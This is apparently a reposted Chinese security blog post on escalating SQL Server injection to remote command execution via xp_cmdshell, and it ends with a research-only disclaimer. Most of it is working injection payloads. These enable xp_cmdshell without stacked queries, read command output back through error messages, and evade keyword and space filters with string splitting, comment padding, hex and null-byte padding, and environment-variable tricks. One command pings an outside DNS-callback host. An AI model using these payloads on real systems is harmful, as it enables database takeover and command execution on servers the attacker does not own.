select user;权限为dbo:
确定当前用户是否为管理员:
SELECT IS_SRVROLEMEMBER('sysadmin')
注意:只有是sysadmin组的sql server账号才能执行系统命令
exec master..xp_cmdshell 'ping a43bade1.ipv6.bypass.eu.org'
直接执行会报错,尝试开启xp_cmdshell:
在高版本的sql server中已经无法使用xp_cmdshell,本文测试版本为sql server2017。
详细介绍如下:
https://stackoverflow.com/questions/59971345/cannot-enable-xp-cmdshell-on-sql-server-2017-express-on-linux
切换sql server为2008:
开启xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
sql server的特性为:数字+字符串,不会报错。
例如sql server会认为id=1and 1=1 就是id=1和and 1=1,自动会做处理
不需要set也能声明变量使用:
1> DECLARE @bc varchar (8000) = 0x6f72616e6765;2> select * from Inventory where name=@bc;3> go
bypass:允许空格脏数据
DECLARE @i varchar (8000) = 0x6f72616e67652020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202> select * from Inventory where name=@i;3> go
不影响执行,原因在于数据后面的空格会被处理掉:
1> select * from Inventory where name="orange";2> select * from Inventory where name="orange
数据前后支持填充00 bypass:
1> DECLARE @i varchar (8000) = 0x0000000000000000000000006f72616e67650000000000000000000000000000002> select * from Inventory where name=@i;3> go
支持查询显示的sql server注入,不支持堆叠也可以rce:
select * from student where name='test'INSERT temp_abcdzxc(data) EXEC master..xp_cmdshell 'whoami' select '1'select * from student where name='test'INSERT temp_abcdzxc(data) EXECute master..xp_cmdshell 'ipconfig'-- 123ipconfig内容很大,会自动分行:
使用execute bypass:
如果命令执行的语句包含空格,那么需要双引号包裹:execute('xp_cmdshell "nslookup baidu.com"')一些变形:支持换行空格填充execute('xp_c'+'md' +'sh'+'ell'+' w'+'ho'+'ami')更大的变形bypass:execute('xp_c'+'md' +'sh'+'ell'+''+'"nslookup baidu.com"')关键字检测的变形:execute('xp_c'+'md' +'sh'+'ell'+''+'"nsl'+'ookup ba'+'idu.com"')执行图在下方:
以数字类型sql注入为例:
第一步创建sql:select * from student where id=1CREATE TABLE test_exec(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100))
第二步:
执行存储过程命令执行插入数据到相关列中:select * from student where id=1 INSERT into test_exec(data) execute('xp_cmdshell whoami')
第三步:
通过sql报错回显命令:select * from student where id=1 and 1=convert(int,(select data from test_exec where id=1))
成功执行命令
第一步:关闭xp_cmdshell
RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0execute('xp_cmdshell "nslookup baidu.com"')
第二步:不支持堆叠的情况下启动xp_cmdshell
以字符串注入为例子:
select * from student where name='ddd' execute('EXEC sp_configure "xp_cmdshell",1')select * from student where name='ddd' execute('RECONFIGURE')
再次执行命令,执行成功没用到分号:
方法2:使用exec执行存储过程(用于过滤括号的场景)
select * from student where name='ddd' exec sp_configure xp_cmdshell,1select * from student where name='ddd' RECONFIGURE
成功执行命令
因为过滤了空格无法使用声明变量的方式执行命令select * from student where name='ddd'/**/exec/**/sp_configure/**/xp_cmdshell,1select * from student where name='ddd'/**/RECONFIGURE因为过滤空格,所以执行命令需要使用特殊办法规避空格execute('xp_cmdshell/**/"nslookup%CommonProgramFiles:~10,-18%baidu.com"')
原文始发于微信公众号(芳华绝代安全团队):sql server注入实现RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论